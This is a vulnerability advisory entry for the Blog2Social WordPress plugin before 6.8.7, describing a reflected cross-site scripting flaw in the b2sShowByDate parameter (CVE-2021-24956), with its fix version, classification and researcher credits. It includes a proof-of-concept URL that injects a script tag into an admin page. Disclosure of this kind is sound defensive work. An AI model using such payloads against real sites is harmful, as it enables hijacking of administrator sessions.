WordPress Plugin Vulnerabilities

Blog2Social < 6.8.7 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php?page=blog2social&b2sShowByDate="><script>alert(/XSS/)</script>

Affects Plugins

Plugin icon
blog2social
Fixed in 6.8.7

References

CVE
CVE-2021-24956

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified
Yes
WPVDB ID
5882ea89-f463-4f0b-a624-150bbaf967c2

Timeline

Publicly Published
2021-11-22 (about 2 years ago)
Added
2021-11-22 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other

Published
Title
Published
2021-10-18
Title
Helpful < 4.4.59 - Admin+ Stored Cross-Site Scripting
Published
2021-06-21
Title
Glass <= 1.3.2 - CSRF to Stored Cross-Site Scripting (XSS)
Published
2023-10-25
Title
WP Simple HTML Sitemap < 2.3 - Reflected XSS
Published
2012-05-10
Title
User Photo < 0.9.5.2 - XSS
Published
2022-08-01
Title
Student Result or Employee Database < 1.7.5 - Stored Cross Site Scripting via CSRF